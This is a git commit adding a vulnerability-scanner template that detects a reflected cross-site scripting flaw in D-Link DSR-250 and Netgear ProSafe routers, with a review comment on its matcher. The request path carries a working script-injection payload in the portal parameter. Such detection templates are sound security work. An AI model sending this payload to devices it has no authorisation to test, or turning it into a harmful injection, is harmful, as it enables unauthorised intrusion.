Create dlink-netgear-xss.yaml

patch-1
gtrrnr 2023-11-24 17:39:42 +03:00 committed by GitHub
parent 9b8da6f22d
commit d6da91b0f9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions


@ -0,0 +1,29 @@
id: dlink-netgear-xss
info:
name: Dlink DSR-250 and Netgear Prosafe - XSS on endpoint scgi-bin/platform.cgi
author: gtrrnr,vulnspace
severity: medium
description: Dlink DSR-250 and Netgear Prosafe are vulnerable to reflected cross site scripting endpoint scgi-bin/platform.cgi in parameter SSLVPN.
reference:
- https://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_june_2015.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
cvss-score: 4.3
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
tags: xss,dlink,netgear
http:
- method: GET
path:
- '{{BaseURL}}/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSLVPN"><script>alert("netgear_dlink_xss")</script>'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "SSLVPN\"><script>alert(\"netgear_dlink_xss\")")'
condition: and
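Review bot: The dsl matcher at the end of the template accepts any 200 response whose body echoes the marker string, without checking that the response is served as HTML, so a plain-text or JSON page that reflects the query would be reported as XSS; adding `- 'contains(content_type, "text/html")'` to the `dsl` list under the existing `condition: and` would cut those false positives. The description names `SSLVPN` as the vulnerable parameter, while the request path shows the payload appended to the `portal` parameter whose value is `SSLVPN`; I would reword it to `reflected cross-site scripting in the portal parameter of scgi-bin/platform.cgi`. Nothing in the matcher ties a hit to a D-Link or Netgear device, so a result should be confirmed against the product before it is filed under those vendors.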